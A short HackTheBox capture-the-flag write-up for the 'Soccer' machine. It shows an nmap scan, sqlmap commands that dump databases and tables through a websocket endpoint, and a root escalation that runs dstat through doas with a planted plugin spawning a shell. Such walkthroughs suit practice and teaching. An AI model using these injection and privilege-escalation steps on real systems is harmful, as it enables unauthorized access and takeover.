Soccer HTB

Nmap scan report for
Host is up (0.041s latency).
Not shown: 65532 closed tcp ports (reset)
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail

Now checking databases: sqlmap -u ws:// --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -dbs

Then finding tables: sqlmap -u ws:// --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -D soccer_db --tables Here we found accounts table

We found a group writeable file called dstat. we also found an SUID binary called doas. It allows execution of commands as other users. To find the config file: find / 2>/dev/null | grep doas It seems we can run dstat as root.

Checking the plugins we can run in /usr/share/dstat/ We can also create a plugin in/usr/local/share/dstat so creating a plugin called with

import os; os.execv("/bin/sh", ["sh"])

Last updated